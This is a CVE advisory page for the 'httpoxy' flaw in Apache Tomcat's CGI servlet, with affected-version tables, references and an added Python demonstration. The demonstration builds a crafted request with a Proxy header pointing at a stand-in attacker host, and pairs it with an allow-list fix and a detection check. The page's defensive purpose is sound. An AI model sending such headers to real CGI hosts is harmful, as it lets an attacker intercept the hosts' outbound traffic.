CVE-2016-5388
Description
Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.
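The mechanism behind the description is a one-line mapping: RFC 3875 section 4.1.18 tells a CGI gateway to expose every request header to the script as `HTTP_<NAME>`, so a client that sends a `Proxy:` header gets `HTTP_PROXY` set in the script's environment, and any HTTP client library that honours that variable will route the script's outbound requests through the attacker's host. The following is an added example written for this page, not Tomcat code (the CGI servlet is Java; this reproduces the same mapping in Python so it can run stand-alone). It shows the verbatim RFC mapping, an allow-list variant that drops `Proxy` (the approach the fixed Tomcat releases take; the regex used here is this example's own assumption, not Tomcat's shipped default, so compare it with the changelog in the references), a child process spawned the way a CGI gateway would to show which proxy it sees, and the edge-side check a reverse proxy or WAF rule would apply. The request head, host names and the `lookup.cgi` path are constructed for the example.

```python
"""httpoxy in a CGI gateway: RFC 3875 header-to-environment mapping, an
allow-list variant, and an edge check for the Proxy header.

Added example for this CVE page; not Tomcat code.  All input is constructed.
"""
import os
import re
import subprocess
import sys
from typing import Dict, Iterable, List, Tuple

# Constructed request head (not captured from a real system).  The attacker
# adds a Proxy header, which no standard HTTP client sends on its own.
SAMPLE_REQUEST = (
    "GET /cgi-bin/lookup.cgi?id=42 HTTP/1.1\r\n"
    "Host: cgi.example.internal\r\n"
    "User-Agent: curl/7.50.0\r\n"
    "Accept: */*\r\n"
    "proxy: http://attacker.example:8080\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a request head into (name, value) pairs, stopping at the blank line."""
    headers = []
    for line in raw.split("\r\n")[1:]:
        if line == "":
            break
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def cgi_env_rfc3875(headers: Iterable[Tuple[str, str]]) -> Dict[str, str]:
    """The mapping the CVE text refers to (RFC 3875 section 4.1.18), applied to
    every header: name upper-cased, '-' replaced by '_', prefixed with HTTP_.
    A client-supplied 'Proxy' header therefore becomes HTTP_PROXY."""
    return {"HTTP_" + n.upper().replace("-", "_"): v for n, v in headers}


# Assumed allow-list for the hardened variant.  The fixed Tomcat releases add
# a configurable allow-list to the CGI servlet; this regex is the example's
# own policy, not Tomcat's shipped default.
ALLOWED_HEADER_RE = re.compile(
    r"^(ACCEPT[-0-9A-Z]*|CACHE-CONTROL|COOKIE|HOST|IF-[-0-9A-Z]*|REFERER|USER-AGENT)$"
)


def cgi_env_allowlist(headers: Iterable[Tuple[str, str]],
                      allowed: "re.Pattern[str]" = ALLOWED_HEADER_RE) -> Dict[str, str]:
    """Same mapping, but only header names matching the allow-list reach the
    environment.  'Proxy' is not on the list, so HTTP_PROXY is never set."""
    env = {}
    for name, value in headers:
        upper = name.upper()
        if allowed.match(upper):
            env["HTTP_" + upper.replace("-", "_")] = value
    return env


def proxy_seen_by_child(env: Dict[str, str]) -> str:
    """Spawn a child with a fresh environment, as a CGI gateway does, and
    report the value an HTTP_PROXY-honouring client library inside it would
    pick up.  Returns '' when no proxy is set."""
    child = "import os; print(os.environ.get('HTTP_PROXY', ''))"
    full_env = {"PATH": os.environ.get("PATH", ""), "REQUEST_METHOD": "GET", **env}
    out = subprocess.run([sys.executable, "-c", child], env=full_env,
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def find_proxy_headers(raw: str) -> List[str]:
    """Edge check (reverse proxy / WAF rule): values of any Proxy header in the
    request head.  Header names are case-insensitive, so 'proxy:' counts."""
    return [v for n, v in parse_headers(raw) if n.lower() == "proxy"]


if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_REQUEST)
    print("vulnerable :", proxy_seen_by_child(cgi_env_rfc3875(hdrs)) or "(no proxy)")
    print("allow-list :", proxy_seen_by_child(cgi_env_allowlist(hdrs)) or "(no proxy)")
    print("edge check :", find_proxy_headers(SAMPLE_REQUEST))
```

Two practical notes: the allow-list is the right shape for a fix because a deny-list of `Proxy` alone still leaves every other attacker-chosen `HTTP_*` name in the environment, and the edge check is worth deploying in front of any CGI or FastCGI host regardless of which gateway is behind it, since the `Proxy` header has no legitimate use in a request.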
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.apache.tomcat:tomcat-catalina | Maven | >= 7.0.0, < 7.0.72 | 7.0.72 |
| org.apache.tomcat:tomcat-catalina | Maven | >= 8.0.0, < 8.5.5 | 8.5.5 |
Affected products
CPE entries (from NVD):
- cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* (range: <= 7.5.5.0)
- cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*
- cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*
- cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*
Package coordinates (from the GitHub Security Advisory; no CPE):
- pkg:maven/org.apache.tomcat/tomcat-catalina (range: >= 7.0.0, < 7.0.72)
- pkg:rpm/suse/tomcat6, distro: SUSE Linux Enterprise Point of Sale 11 SP3 (range: < 6.0.53-0.56.1)
- pkg:rpm/suse/tomcat6, distro: SUSE Linux Enterprise Server 11 SP3-LTSS (range: < 6.0.53-0.56.1)
- pkg:rpm/suse/tomcat6, distro: SUSE Linux Enterprise Server 11 SP3-TERADATA (range: < 6.0.53-0.56.1)
- pkg:rpm/suse/tomcat6, distro: SUSE Linux Enterprise Server 11 SP4 (range: < 6.0.45-0.53.2)
- pkg:rpm/suse/tomcat6, distro: SUSE Linux Enterprise Server for SAP Applications 11 SP4 (range: < 6.0.45-0.53.2)
- pkg:rpm/suse/tomcat, distro: SUSE Linux Enterprise Server 12 SP1 (range: < 8.0.32-8.7)
- pkg:rpm/suse/tomcat, distro: SUSE Linux Enterprise Server 12-LTSS (range: < 7.0.78-7.13.4)
- pkg:rpm/suse/tomcat, distro: SUSE Linux Enterprise Server for SAP Applications 12 (range: < 7.0.78-7.13.4)
- pkg:rpm/suse/tomcat, distro: SUSE Linux Enterprise Server for SAP Applications 12 SP1 (range: < 8.0.32-8.7)
References
- www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html [nvd: Patch, Third Party Advisory]
- lists.opensuse.org/opensuse-updates/2016-09/msg00025.html [nvd, ghsa: Third Party Advisory]
- rhn.redhat.com/errata/RHSA-2016-1624.html [nvd, ghsa: Third Party Advisory]
- rhn.redhat.com/errata/RHSA-2016-2045.html [nvd, ghsa: Third Party Advisory]
- rhn.redhat.com/errata/RHSA-2016-2046.html [nvd, ghsa: Third Party Advisory]
- www.kb.cert.org/vuls/id/797896 [nvd, ghsa: Third Party Advisory, US Government Resource]
- www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html [nvd: Third Party Advisory]
- www.securityfocus.com/bid/91818 [nvd: Third Party Advisory, VDB Entry]
- www.securitytracker.com/id/1036331 [nvd: Third Party Advisory, VDB Entry, Vendor Advisory]
- access.redhat.com/errata/RHSA-2016:1635 [nvd: Third Party Advisory]
- access.redhat.com/errata/RHSA-2016:1636 [nvd: Third Party Advisory]
- github.com/advisories/GHSA-v646-rx6w-r3qq [ghsa: Advisory]
- h20566.www2.hpe.com/hpsc/doc/public/display [nvd: Third Party Advisory] (document id query string not preserved on this page)
- h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay [nvd: Third Party Advisory] (listed three times by NVD; document id query strings not preserved on this page)
- httpoxy.org [nvd: Third Party Advisory]
- nvd.nist.gov/vuln/detail/CVE-2016-5388 [ghsa: Advisory]
- tomcat.apache.org/tomcat-7.0-doc/changelog.html [nvd: Release Notes, Vendor Advisory]
- www.apache.org/security/asf-httpoxy-response.txt [nvd: Vendor Advisory]
- access.redhat.com/security/cve/CVE-2016-5388 [ghsa]
- bugzilla.redhat.com/show_bug.cgi [ghsa] (bug id query string not preserved on this page)
- github.com/apache/tomcat/commit/1b91e91194a095ea922f96d1dccddf6fbc446e54 [ghsa]
- github.com/apache/tomcat/commit/880250877b0643956435282afb9c111450cfff4c [ghsa]
- github.com/apache/tomcat/commit/fb3569fbb9a2f55459aa8e1e22bc35a737e66329 [ghsa]
- lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E [nvd, ghsa]
- lists.apache.org/thread.html/6b414817c2b0bf351138911c8c922ec5dd577ebc0b9a7f42d705752d@%3Cissues.activemq.apache.org%3E [nvd, ghsa]
- lists.apache.org/thread.html/6d3d34adcf3dfc48e36342aa1f18ce3c20bb8e4c458a97508d5bfed1@%3Cissues.activemq.apache.org%3E [nvd, ghsa]
- lists.apache.org/thread.html/r2853582063cfd9e7fbae1e029ae004e6a83482ae9b70a698996353dd@%3Cusers.tomcat.apache.org%3E [nvd, ghsa]
- lists.apache.org/thread.html/rc6b2147532416cc736e68a32678d3947b7053c3085cf43a9874fd102@%3Cusers.tomcat.apache.org%3E [nvd, ghsa]
- lists.apache.org/thread.html/rf21b368769ae70de4dee840a3228721ae442f1d51ad8742003aefe39@%3Cusers.tomcat.apache.org%3E [nvd, ghsa]
- lists.debian.org/debian-lts-announce/2019/08/msg00015.html [nvd]